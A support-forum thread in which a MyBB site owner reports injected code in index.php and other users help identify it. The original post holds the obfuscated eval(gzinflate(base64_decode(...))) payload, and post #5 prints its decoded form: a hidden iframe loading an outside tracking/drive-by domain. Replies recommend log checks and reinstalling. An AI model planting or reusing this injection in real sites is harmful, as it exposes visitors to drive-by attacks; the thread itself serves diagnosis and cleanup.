Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
virus or else..!!
#1
Yesterday my admin panel was redirecting to some other site without my knowledge in mobile and same was on forum index page on mobile. After checking index.php in both root and admincp, i found this code added in both files

<?php eval(gzinflate(base64_decode('7L0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8iivN063ctmiZvt36387a8c+cXpxdlNcnKFH8e4p/Pdg9/4+THfiyv66r+/et8VdVtsbzY2rnDH6/qYtluffy4OK+zRZ5eFbN2/tlHuzsfpfO8uJi38nvTXpf5Zx9dFk0xKcqivX40L2azfHm4qpqiLarlo2zSVOW6zQ/L/Lx9tHPYViv6l96sp599NG/b1aO7d6dlMX075n+bVV2Nq/ri7nmez+5y3814NV/9Huti9tn9T3+hfPLZvY+OHt8V1I4+BsK/5DdO/p8AAAD//w==')));?>

Don't know how it got added....
#2
Check your hosts logs
#3
Reupload a new copy of MyBB immediately. Check your FTP logs and plugins.
-Paul H.

Cogisne lingua latina?
#4
This user has been denied support. This user has been denied support.
It's a possible malicious code. Possibly a hidden file upload script type of code.
#5
it evaluates to

if (!isset($ftl)){ global $ftl;$ftl=1; error_reporting(0); print('<iframe width="10" height="10" style="visibility:hidden;position:absolute;left:0;top:0;" src="http://click.clickspro.org/feed/frames.php?uid=56&frames=3"></iframe>'); }
Lost interest, sold my sites, will browse here once in a while. It's been fun.
#6
Seems like this was an issue a few versions back. Could you make sure you have the latest version of MyBB installed?
#7
I have latest mybb installed....
Will copy the fresh files now.
#8
A maliciou virus.
#9
This user has been denied support. This user has been denied support.
It's a silent drive by, I'd run a virus scan on your computer too.


Forum Jump:


Users browsing this thread: 1 Guest(s)